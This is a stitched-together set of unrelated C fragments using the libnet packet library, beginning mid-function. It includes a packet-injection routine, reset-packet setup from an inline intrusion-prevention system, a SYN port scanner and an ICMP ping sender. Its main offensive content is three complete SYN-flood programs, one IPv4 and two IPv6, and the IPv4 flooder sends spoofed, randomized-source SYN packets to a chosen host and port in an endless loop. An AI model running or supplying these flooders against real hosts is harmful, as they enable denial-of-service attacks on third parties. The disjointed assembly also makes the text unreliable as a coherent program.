(dp->opts & O_CHKISN ? ", DROPPING PACKET" : ""), isn); if (dp->opts & O_CHKISN) return; } LIBNET_ERR(dp->p_tcp = libnet_build_tcp( TCP_PHASE(dp->flags, sport, th->th_dport), /* Source port */ dp->dport, /* Destination port */ TCP_PHASE(dp->flags, isn, (th->th_ack + paylen)), /* ISN */ /* Sniffed packet's seq num */ TCP_PHASE(dp->flags, 0, (th->th_seq + 1)), /* ACK */ TCP_PHASE(dp->flags, dp->flags, dp->flags /*| TH_PUSH*/), /* Control flags */ dp->winsize, /* window size */ 0, /* auto checksum */ 0, /* Urgent data pointer */ TCP_PHASE(dp->flags, LIBNET_TCP_H, LIBNET_TCP_H + paylen), /* total packet length */ TCP_PHASE(dp->flags, NULL, (u_char *)dp->payload), /* payload */ TCP_PHASE(dp->flags, 0, paylen), /* payload size */ dp->l, /* libnet context */ dp->p_tcp /* ptag */ )); LIBNET_ERR(dp->p_ip = libnet_build_ipv4( TCP_PHASE(dp->flags, LIBNET_IPV4_H + LIBNET_TCP_H, LIBNET_IPV4_H + LIBNET_TCP_H + paylen), TCP_PHASE(dp->flags, 0, IPTOS_LOWDELAY), /* TOS */ libnet_get_prand(LIBNET_PRu16), 0, /* Frag */ MAX_TTL, /* TTL */ IPPROTO_TCP, /* Protocol */ 0, /* auto checksum */ TCP_PHASE(dp->flags, htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset), ih->ip_dst.s_addr), /* XXX error check, source */ TCP_PHASE(dp->flags, libnet_name2addr4(dp->l, dp->daddr, LIBNET_DONT_RESOLVE), ih->ip_src.s_addr), /* XXX error check, destination */ NULL, /* payload */ 0, /* payload size */ dp->l, /* libnet context */ dp->p_ip /* libnet ptag */ )); if (libnet_write(dp->l) == -1) state = "x"; (void)fprintf(stdout, "(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u\n", state, TCP_PHASE( dp->flags, libnet_addr2name4( htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset), LIBNET_DONT_RESOLVE ), libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE) ), sport, TCP_PHASE( dp->flags, dp->daddr, libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE) ), dp->dport); (void)fflush(stdout); }
/* * Function: void InitInlinePostConfig * * Purpose: perform initialization tasks that depend on the configfile * * Args: none * * Returns: nothing void function */ void InitInlinePostConfig(void) { int tcp_size = 0; int icmp_size = 0; //printf("InitInline stage 2: InitInlinePostConfig starting...\n"); /* Let's initialize Libnet, but not if we are in * layer 2 resets mode, because we use the link * layer then... */ #ifndef IPFW if(pv.layer2_resets) { tcp_size = ETH_H + IP_H + TCP_H; icmp_size = 128 + ETH_H; } else #endif { //printf("opening raw socket in IP-mode\n"); if((libnet_nd = libnet_open_raw_sock(IPPROTO_RAW)) < 0) { fprintf(stdout, "InitInline: Could not open raw socket for libnet\n"); exit(-1); } tcp_size = IP_H + TCP_H; icmp_size = 128; } /* init */ l_tcp = calloc(tcp_size, sizeof(char)); if (l_tcp == NULL) { perror("InitInline: Could not allocate l_tcp\n"); exit(-1); } l_icmp = calloc(icmp_size, sizeof(char)); if (l_icmp == NULL) { perror("InitInline: Could not allocate l_icmp\n"); exit(-1); } #ifndef IPFW if(pv.layer2_resets) { /* Building Layer 2 Reset Packets */ printf("building cached link layer reset packets\n"); libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 255, IPPROTO_TCP, 0, 0, NULL, 0, l_tcp + ETH_H); libnet_build_tcp(0, 0, 0, 0, TH_RST|TH_ACK, 0, 0, NULL, 0, l_tcp + ETH_H + IP_H); /* create icmp cached packet */ libnet_build_ip(ICMP_UNREACH_H, 0, libnet_get_prand(PRu16), 0, 255, IPPROTO_ICMP, 0, 0, NULL, 0, l_icmp + ETH_H); libnet_build_icmp_unreach(3, 3, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, l_icmp + ETH_H + IP_H); } else #endif { /* Building Socket Reset Packets */ printf("building cached socket reset packets\n"); libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 255, IPPROTO_TCP, 0, 0, NULL, 0, l_tcp); libnet_build_tcp(0, 0, 0, 0, TH_RST|TH_ACK, 0, 0, NULL, 0, l_tcp + IP_H); /* create icmp cached packet */ libnet_build_ip(ICMP_UNREACH_H, 0, libnet_get_prand(PRu16), 0, 255, IPPROTO_ICMP, 0, 0, NULL, 0, l_icmp); libnet_build_icmp_unreach(3, 3, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, l_icmp + IP_H); } }
int main(int argc, char **argv) { struct libnet_in6_addr dst_ip; struct libnet_in6_addr src_ip; u_short dst_prt = 0; u_short src_prt = 0; libnet_t *l; libnet_ptag_t tcp, ip, ip_frag; u_char *cp; char errbuf[LIBNET_ERRBUF_SIZE]; int i, j, c, packet_amt, burst_int, burst_amt; char srcname[100], dstname[100]; u_int8_t payload[56]; packet_amt = 0; burst_int = 0; burst_amt = 1; tcp = ip_frag = ip = LIBNET_PTAG_INITIALIZER; printf("libnet 1.1 syn flooding: TCP IPv6 fragments [raw]\n"); l = libnet_init( LIBNET_RAW6, /* injection type */ NULL, /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } while((c = getopt(argc, argv, "t:a:i:b:")) != EOF) { switch (c) { case 't': if (!(cp = strrchr(optarg, '/'))) { usage(argv[0]); exit(EXIT_FAILURE); } *cp++ = 0; dst_prt = (u_short)atoi(cp); dst_ip = libnet_name2addr6(l, optarg, 1); if (strncmp((char*)&dst_ip, (char*)&in6addr_error,sizeof(in6addr_error))==0) { fprintf(stderr, "Bad IPv6 address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'a': packet_amt = atoi(optarg); break; case 'i': burst_int = atoi(optarg); break; case 'b': burst_amt = atoi(optarg); break; default: usage(argv[0]); exit(EXIT_FAILURE); } } src_ip = libnet_name2addr6(l, "0:0:0:0:0:0:0:1", LIBNET_DONT_RESOLVE); /* src_ip = libnet_name2addr6(l, "3ffe:400:60:4d:250:fcff:fe2c:a9cd", LIBNET_DONT_RESOLVE); dst_prt = 113; dst_ip = libnet_name2addr6(l, "nathan.ip6.uni-ulm.de", LIBNET_RESOLVE); packet_amt = 1; */ if (!dst_prt || strncmp((char*)&dst_ip, (char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt) { usage(argv[0]); exit(EXIT_FAILURE); } libnet_seed_prand(l); libnet_addr2name6_r(src_ip, LIBNET_RESOLVE, srcname, sizeof(srcname)); libnet_addr2name6_r(dst_ip, LIBNET_RESOLVE, dstname, sizeof(dstname)); for(; burst_amt--;) { for (i = 0; i < packet_amt; i++) { for (j = 0; j < 56; j++) payload[j] = 'A' + ((char)(j % 26)); tcp = libnet_build_tcp( src_prt = libnet_get_prand(LIBNET_PRu16), dst_prt, libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32), TH_SYN, libnet_get_prand(LIBNET_PRu16), 0, 0, LIBNET_TCP_H, NULL, 0, l, tcp); if (tcp == -1) { fprintf(stderr, "Can't build or modify TCP header: %s\n", libnet_geterror(l)); return (EXIT_FAILURE); } ip_frag = libnet_build_ipv6_frag( IPPROTO_TCP, /* next header */ 0, /* reserved */ 0, /* frag bits */ 1, /* ip id */ NULL, 0, l, ip_frag); if (ip_frag == -1) { fprintf(stderr, "Can't build or modify TCP header: %s\n", libnet_geterror(l)); return (EXIT_FAILURE); } ip = libnet_build_ipv6( 0, 0, LIBNET_TCP_H, IPPROTO_TCP, 64, src_ip, dst_ip, NULL, 0, l, ip); if (ip == -1) { fprintf(stderr, "Can't build or modify TCP header: %s\n", libnet_geterror(l)); return (EXIT_FAILURE); } printf("%15s/%5d -> %15s/%5d\n", srcname, ntohs(src_prt), dstname, dst_prt); c = libnet_write(l); if (c == -1) { fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l)); } #if !(__WIN32__) usleep(250); #else Sleep(250); #endif } #if !(__WIN32__) sleep(burst_int); #else Sleep(burst_int * 1000); #endif } exit(EXIT_SUCCESS); }
int main(int argc, char *argv[]) { libnet_t *libnet_context; u_long dest_ip; u_short dest_port; u_char errbuf[LIBNET_ERRBUF_SIZE]; int opt, byte_count, packet_size = LIBNET_IPV4_H + LIBNET_TCP_H; if(argc < 3) { printf("Usage:\n%s\t <target host> <target port>\n", argv[0]); exit(1); } libnet_context = libnet_init(LIBNET_RAW4, NULL, errbuf); // Init libnet context if ( libnet_context == NULL ) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } dest_ip = libnet_name2addr4(libnet_context, argv[1], LIBNET_RESOLVE); // the host dest_port = (u_short) atoi(argv[2]); // the port libnet_seed_prand(libnet_context); // seed the random number generator printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)); while(1) // loop forever (until break by CTRL-C) { libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random) dest_port, // destination TCP port libnet_get_prand(LIBNET_PRu32), // sequence number (randomized) libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized) TH_SYN, // control flags (SYN flag set only) libnet_get_prand(LIBNET_PRu16), // window size (randomized) 0, // checksum (0 autofill) 0, // urgent pointer LIBNET_TCP_H, // tcp packet length NULL, // payload (none) 0, // payload length libnet_context, // context 0); // ptag libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, // size of the packet sans IP header IPTOS_LOWDELAY, // IP tos libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 0, // frag stuff libnet_get_prand(LIBNET_PR8), // TTL (randomized) IPPROTO_TCP, // transport protocol 0, // checksum libnet_get_prand(LIBNET_PRu32), // source IP (randomized) dest_ip, // destination IP NULL, // payload (none) 0, // payload length libnet_context, // libnet context 0); // ptag byte_count = libnet_write(libnet_context); // inject packet if ( byte_count != -1 ) printf("%d bytes written.\n", byte_count); else fprintf(stderr, "Error writing packet: %s\n",\ libnet_geterror(libnet_context)); libnet_clear_packet(libnet_context); // clear packet usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds } libnet_destroy(libnet_context); // free packet memory return 0; }
int main(int argc, char **argv) { struct libnet_in6_addr dst_ip; struct libnet_in6_addr src_ip; u_short dst_prt = 0; u_short src_prt = 0; libnet_t *l; libnet_ptag_t t; char *cp; char errbuf[LIBNET_ERRBUF_SIZE]; int i, c, packet_amt, burst_int, burst_amt, build_ip; char srcname[100],dstname[100]; packet_amt = 0; burst_int = 0; burst_amt = 1; printf("libnet 1.1 syn flooding: TCP6[raw]\n"); /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW6, /* injection type */ NULL, /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } while((c = getopt(argc, argv, "t:a:i:b:")) != EOF) { switch (c) { case 't': if (!(cp = strrchr(optarg, '/'))) { usage(argv[0]); exit(EXIT_FAILURE); } *cp++ = 0; dst_prt = (u_short)atoi(cp); dst_ip = libnet_name2addr6(l, optarg, 1); if (strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0) { fprintf(stderr, "Bad IP6 address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'a': packet_amt = atoi(optarg); break; case 'i': burst_int = atoi(optarg); break; case 'b': burst_amt = atoi(optarg); break; default: usage(argv[0]); exit(EXIT_FAILURE); } } src_ip = libnet_name2addr6(l, "0:0:0:0:0:0:0:1", LIBNET_DONT_RESOLVE); /*src_ip = libnet_name2addr6(l, "3ffe:400:60:4d:250:fcff:fe2c:a9cd", LIBNET_DONT_RESOLVE); dst_prt = 113; dst_ip = libnet_name2addr6(l, "nathan.ip6.uni-ulm.de", LIBNET_RESOLVE); packet_amt = 1;*/ if (!dst_prt || strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt) { usage(argv[0]); exit(EXIT_FAILURE); } libnet_seed_prand(l); libnet_addr2name6_r(src_ip,1,srcname,sizeof(srcname)); libnet_addr2name6_r(dst_ip,1,dstname,sizeof(dstname)); for(t = LIBNET_PTAG_INITIALIZER, build_ip = 1; burst_amt--;) { for (i = 0; i < packet_amt; i++) { char payload[56]; int i; for (i=0; i<56; i++) payload[i]='A'+((char)(i%26)); t = libnet_build_tcp( src_prt = libnet_get_prand(LIBNET_PRu16), dst_prt, libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32), TH_SYN, libnet_get_prand(LIBNET_PRu16), 0, 0, LIBNET_TCP_H, NULL, 0, l, t); if (build_ip) { build_ip = 0; printf("Packet len = %ld\n",LIBNET_ICMPV6_H+sizeof(payload)); libnet_build_ipv6(0,0, LIBNET_TCP_H, IPPROTO_TCP, 64, src_ip, dst_ip, NULL, 0, l, 0); } printf("%15s/%5d -> %15s/%5d\n", srcname, ntohs(src_prt), dstname, dst_prt); c = libnet_write(l); if (c == -1) { fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l)); } #if !(__WIN32__) usleep(250); #else Sleep(250); #endif } #if !(__WIN32__) sleep(burst_int); #else Sleep(burst_int * 1000); #endif } exit(EXIT_SUCCESS); }
void sendsyns () { libnet_t *l; char errbuf[LIBNET_ERRBUF_SIZE]; u_long ip; libnet_ptag_t tcp_pkt = LIBNET_PTAG_INITIALIZER; libnet_ptag_t ip_pkt; u_long dst_ip; int count = 0; char *payload = ""; // put your love note here. u_short payload_s = strlen (payload); int currentport = opts.low_port; int build_header = 1; /* * pcap may be slow to initialize, so let's wait a second. */ sleep (1); /* * initialize libnet for raw IP packets. libnet will * find an appropriate interface. */ l = libnet_init (LIBNET_RAW4, NULL, errbuf); if (l == NULL) { fprintf (stderr, "libnet_init failed: %s", errbuf); exit (1); } /* * get the IP address of the source interface */ ip = libnet_get_ipaddr4 (l); if (-1 == ip) { fprintf (stderr, "libnet_get_ipaddr4(l) failed: "); fprintf (stderr, "%s\n", libnet_geterror (l)); exit (1); } dst_ip = libnet_name2addr4 (l, (u_char *) opts.target, LIBNET_RESOLVE); if (-1 == dst_ip) { fprintf (stderr, "libnet_name2addr4() failed: "); fprintf (stderr, "%s\n", libnet_geterror (l)); exit (1); } /* * Build and send a SYN packet, one for each port. The first time * this loop is executed an IP packet will be constructed. */ printf ("scanning port %d through %d on %s\n", opts.low_port, opts.high_port, libnet_addr2name4 (dst_ip, LIBNET_DONT_RESOLVE)); while (currentport <= opts.high_port) { /* * Sleep a little... if we send packets too fast, some will get * dropped. */ usleep (50); /* * Build the TCP packet with the SYN flag set. A payload is * optional; for automated scans it is nice to include some text * explaining why you are scanning (or ask first!). Fields with * 0 will be calculated by libnet. */ tcp_pkt = libnet_build_tcp (opts.src_port, // source port currentport++, // dest port libnet_get_prand (LIBNET_PRu32), // seq libnet_get_prand (LIBNET_PRu32), // ack TH_SYN, // flags libnet_get_prand (LIBNET_PRu16), // window size 0, // checksum 0, // urgent ptr LIBNET_TCP_H + payload_s, // packet size (u_char *) payload, // contents of packet payload_s, // size of payload l, // libnet handle tcp_pkt); // libnet id if (-1 == tcp_pkt) { fprintf (stderr, "libnet_build_tcp() failed: "); fprintf (stderr, "%s\n", libnet_geterror (l)); exit (1); } if (build_header) { build_header = 0; ip_pkt = libnet_autobuild_ipv4 (LIBNET_IPV4_H + LIBNET_TCP_H, IPPROTO_TCP, dst_ip, l); if (-1 == ip_pkt) { fprintf (stderr, "libnet_autobuild_ipv4() failed: "); fprintf (stderr, "%s\n", libnet_geterror (l)); } } /* * Send it! */ count = libnet_write (l); if (-1 == count) { fprintf (stderr, "libnet_write() failed: "); fprintf (stderr, "%s\n", libnet_geterror (l)); } } printf ("\n"); }
int main() { libnet_t *l; /* libnet context */ char errbuf[LIBNET_ERRBUF_SIZE], ip_addr_str[16]; u_int32_t ip_addr; u_int16_t id, seq; int i; l = libnet_init(LIBNET_RAW4, NULL, errbuf); if ( l == NULL ) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } /* Generating a random id */ libnet_seed_prand(l); id = (u_int16_t)libnet_get_prand(LIBNET_PR16); /* Getting destination IP address */ printf("Destination IP address: "); scanf("%15s",ip_addr_str); ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE); if ( ip_addr == -1 ) { fprintf(stderr, "Error converting IP address.\n"); libnet_destroy(l); exit(EXIT_FAILURE); } /* Writing 4 packets */ seq = 1; for ( i = 0; i < 4; i++ ) { /* Building the ICMP header */ if ( libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id,\ (seq + i), NULL, 0, l, 0) == -1 ) { fprintf(stderr, "Error building ICMP header: %s\n",\ libnet_geterror(l)); libnet_destroy(l); exit(EXIT_FAILURE); } /* Building the IP header */ if ( libnet_autobuild_ipv4(LIBNET_IPV4_H + \ LIBNET_ICMPV4_ECHO_H, IPPROTO_ICMP,\ ip_addr, l) == -1 ) { fprintf(stderr, "Error building IP header: %s\n",\ libnet_geterror(l)); libnet_destroy(l); exit(EXIT_FAILURE); } if ( libnet_write(l) == -1 ) fprintf(stderr, "Error writing packet: %s\n",\ libnet_geterror(l)); /* Clearing the packet */ /* Comment this to see what happens when you rebuild headers * without calling libnet_clear_packet() */ libnet_clear_packet(l); /* Waiting 1 second between each packet */ sleep(1); } libnet_destroy(l); return 0; }